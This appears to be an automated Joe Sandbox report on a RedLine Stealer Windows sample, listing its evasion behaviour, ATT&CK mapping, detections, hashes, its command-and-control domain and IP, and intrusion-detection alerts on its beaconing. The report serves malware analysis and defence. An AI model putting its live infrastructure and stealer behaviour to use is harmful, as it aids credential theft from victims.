Source: C:\Users\user\Desktop\bac4j0DRRb.exe TID: 3716	Thread sleep count: 46 > 30			Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe TID: 3716	Thread sleep time: -46000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Last function: Thread delayed

Source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\bac4j0DRRb.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\bac4j0DRRb.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Queries volume information: C:\Users\user\Desktop\bac4j0DRRb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\bac4j0DRRb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: bac4j0DRRb.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bac4j0DRRb.exe PID: 4028, type: MEMORYSTR

Source: Yara match	File source: bac4j0DRRb.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bac4j0DRRb.exe PID: 4028, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: bac4j0DRRb.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bac4j0DRRb.exe PID: 4028, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Timestomp	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
bac4j0DRRb.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.SpiderRedLine
bac4j0DRRb.exe	100%	Avira	HEUR/AGEN.1305493
bac4j0DRRb.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ierinapu.xyz	18.141.10.107	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
ierinapu.xyz:80	true		unknown
http://ierinapu.xyz/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	bac4j0DRRb.exe	false		unknown
http://tempuri.org/Endpoint/GetArgumentsLRjq	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	bac4j0DRRb.exe	false		unknown
http://tempuri.org/Endpoint/GetArguments	bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	bac4j0DRRb.exe	false		unknown
http://schemas.xmlsoap.org/soap/envelope/	bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029F5000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000294C000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000299D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000298D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000291E000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000296D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002916000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000293F000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000297D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ierinapu.xyz	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000296D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000297D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/	bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029F5000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000294C000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000299D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000298D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000291E000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000296D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002916000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000293F000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000297D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/Endpoint/GetArgumentsResponse	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.ipify.org	bac4j0DRRb.exe	false	URL Reputation: safe	unknown
http://tempuri.org/0t	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002916000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/Endpoint/VerifyScanRequestLRjq(	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ierinapu.xyz:80/	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/Endpoint/	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/Endpoint/VerifyUpdateLRjq	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/Endpoint/GetArgumentsT	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002909000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002909000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyScanRequestResponse	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/actor/next	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesLRjq	bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.141.10.107	ierinapu.xyz	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538231
Start date and time:	2024-10-20 21:01:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bac4j0DRRb.exe renamed because original name is a hash value
Original Sample Name:	AD9E28142AB51F364542C7DAC2D73A8C.exe
Detection:	MAL
Classification:	mal100.troj.winEXE@1/0@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 98% Number of executed functions: 63 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target bac4j0DRRb.exe, PID 4028 because it is empty
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: bac4j0DRRb.exe

Simulations

Behavior and APIs

Time	Type	Description
15:03:29	API Interceptor	15x Sleep call for process: bac4j0DRRb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
18.141.10.107	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	acwjcqqv.biz/rtsxpsr
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	jlqltsjvh.biz/krptoxvfaaekxm
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	warkcdu.biz/dvvbbgutuwtwsq
	oUc5lyEzJy.exe	Get hash	malicious	Unknown	Browse	difficultuntil.net/index.php
	JUHGSyleu7.exe	Get hash	malicious	Unknown	Browse	difficultuntil.net/index.php
	oUc5lyEzJy.exe	Get hash	malicious	Unknown	Browse	difficultuntil.net/index.php
	JUHGSyleu7.exe	Get hash	malicious	Unknown	Browse	difficultuntil.net/index.php
	4wwi2Lh5W4.exe	Get hash	malicious	Unknown	Browse	difficultuntil.net/index.php
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	jlqltsjvh.biz/njjdm
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	jlqltsjvh.biz/og

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ierinapu.xyz	Vape Patch.exe	Get hash	malicious	RedLine	Browse	212.224.105.79
	sR1XYo3zO1.exe	Get hash	malicious	RedLine	Browse	178.20.47.91
	8G67yXlPMi.exe	Get hash	malicious	RedLine	Browse	178.20.47.91
	FpsBoost.exe.exe	Get hash	malicious	RedLine	Browse	141.136.0.119
	7Ai9tfDiLG.exe	Get hash	malicious	RedLine	Browse	94.140.114.44

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.154.178.112
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	52.42.114.180
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	65.3.254.20
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	18.141.10.107
	WinFIG.exe	Get hash	malicious	LummaC	Browse	52.222.236.120
	WinFIG-2024.exe	Get hash	malicious	LummaC	Browse	52.222.236.48
	SentinelOculus.exe	Get hash	malicious	LummaC	Browse	52.222.236.23
	bin.x86_64.elf	Get hash	malicious	Gafgyt, Mirai	Browse	52.222.183.52
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	44.255.220.9

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.8100248969799795
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	bac4j0DRRb.exe
File size:	98'304 bytes
MD5:	ad9e28142ab51f364542c7dac2d73a8c
SHA1:	8bd52e4e93b44a347d05c3c94c397354894088ae
SHA256:	a9ec84d22acda7f438810bae0831bc151e6784f2005c896d687ab295ef4a7fd5
SHA512:	22b66f48183a78e209ed05d3f8ee952fc2740545264a406a6e9a1dfd4aa237afa675c73b681a9a946ca25f50a14a25d6b770fdb804d0c139f21853e3a7959c46
SSDEEP:	1536:scdIy9hl8Q4lD2j2j9xEtKzGb4pQ33HbPyFMdEOL3iKx/SEeG6am:scWshrYqO9xkx3HTy+dRFm
TLSH:	DBA33B25E3ACCA25D7BE4535B970112547F1E28B7041EBCB8DC0A8DF2E637C26A255F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y.................0..p..........R~... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x417e52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB7C91059 [Fri Sep 16 14:04:09 2067 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
popad
add byte ptr [ebp+00h], dh
je 00007EFC18DE6A32h
outsd
add byte ptr [esi+00h], ah
imul eax, dword ptr [eax], 006C006Ch
add byte ptr [eax+00h], bh
jo 00007EFC18DE6A32h
imul eax, dword ptr [eax], 00610072h
popad
add byte ptr [ebx+00h], dh
xor al, byte ptr [eax]
xor dword ptr [eax], eax
je 00007EFC18DE6A32h
imul eax, dword ptr [eax], 006E006Fh
pop edi
add byte ptr [ecx+00h], bh
popad
add byte ptr [ebx+00h], dh
xor al, byte ptr [eax]
xor dword ptr [eax], eax
add byte ptr [ecx+00h], ah
jc 00007EFC18DE6A32h
add byte ptr [eax], al
push eax
add byte ptr [edx+00h], dh
outsd
add byte ptr [esi+00h], ah
imul eax, dword ptr [eax], 0065006Ch
jnc 00007EFC18DE6A32h
push esp
add byte ptr [edi+00h], ch
je 00007EFC18DE6A32h
popad
add byte ptr [eax+eax+20h], ch
add byte ptr [edi+00h], ch
add byte ptr [eax], ah
add byte ptr [edx+00h], dl
inc ecx
add byte ptr [ebp+00h], cl
push 74007400h
add byte ptr [eax+00h], dh
jnc 00007EFC18DE6A32h
cmp al, byte ptr [eax]
das
add byte ptr [edi], ch
add byte ptr [ecx+00h], ah
jo 00007EFC18DE6A32h
imul eax, dword ptr [eax], 0069002Eh
jo 00007EFC18DE6A32h
add byte ptr [ebx+00h], dh
bound eax, dword ptr [eax]
das
add byte ptr [edi+00h], ah
add byte ptr [edi+00h], ch
imul eax, dword ptr [eax], 00000070h
and eax, 53005500h
add byte ptr [ebp+00h], al
push edx
add byte ptr [eax+00h], dl
inc ebp
add byte ptr [esi+00h], ch
jbe 00007EFC18DE6A32h
imul eax, dword ptr [eax], 006F0072h
outsb
add byte ptr [ebp+00h], ch
add byte ptr [esi+00h], ch
je 00007EFC18DE6A32h
push edx
add byte ptr [edi+00h], cl
inc esi
add byte ptr [ecx+00h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17e00	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x4dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x17de4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x16c08	0x17000	70562c7ea263314ec8976641d8f2638d	False	0.4346870754076087	data	5.92748062692072	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0x4dc	0x800	711e941cfcea15d24c94223426da5c4e	False	0.2841796875	data	3.0005540254604153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c000	0xc	0x400	e4c1d0dd0af3102ca4f091f961377849	False	0.025390625	data	0.05585530805374581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1a090	0x24c	data			0.46258503401360546
RT_MANIFEST	0x1a2ec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-20T21:02:05.829393+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49704	18.141.10.107	80	TCP
2024-10-20T21:02:08.742100+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49705	18.141.10.107	80	TCP
2024-10-20T21:02:11.392076+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49706	18.141.10.107	80	TCP
2024-10-20T21:02:14.540121+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49707	18.141.10.107	80	TCP
2024-10-20T21:02:17.133861+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49708	18.141.10.107	80	TCP
2024-10-20T21:02:17.139662+0200	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.5	49708	TCP
2024-10-20T21:02:17.139662+0200	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.5	49708	TCP
2024-10-20T21:02:19.918328+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49713	18.141.10.107	80	TCP
2024-10-20T21:02:22.456520+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49727	18.141.10.107	80	TCP
2024-10-20T21:02:25.067847+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49742	18.141.10.107	80	TCP
2024-10-20T21:02:27.613147+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49752	18.141.10.107	80	TCP
2024-10-20T21:02:30.197493+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49763	18.141.10.107	80	TCP
2024-10-20T21:02:32.792047+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49775	18.141.10.107	80	TCP
2024-10-20T21:02:35.364874+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49787	18.141.10.107	80	TCP
2024-10-20T21:02:38.422893+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49797	18.141.10.107	80	TCP
2024-10-20T21:02:40.994757+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49811	18.141.10.107	80	TCP
2024-10-20T21:02:43.552295+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49823	18.141.10.107	80	TCP
2024-10-20T21:02:46.136200+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49834	18.141.10.107	80	TCP
2024-10-20T21:02:49.164825+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49847	18.141.10.107	80	TCP
2024-10-20T21:02:51.747237+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49860	18.141.10.107	80	TCP
2024-10-20T21:02:54.307507+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49872	18.141.10.107	80	TCP
2024-10-20T21:02:56.905258+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49883	18.141.10.107	80	TCP
2024-10-20T21:02:59.466963+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49897	18.141.10.107	80	TCP
2024-10-20T21:03:02.050809+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49912	18.141.10.107	80	TCP
2024-10-20T21:03:05.062590+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49923	18.141.10.107	80	TCP
2024-10-20T21:03:07.601149+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49938	18.141.10.107	80	TCP
2024-10-20T21:03:10.161871+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49950	18.141.10.107	80	TCP
2024-10-20T21:03:12.946777+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49961	18.141.10.107	80	TCP
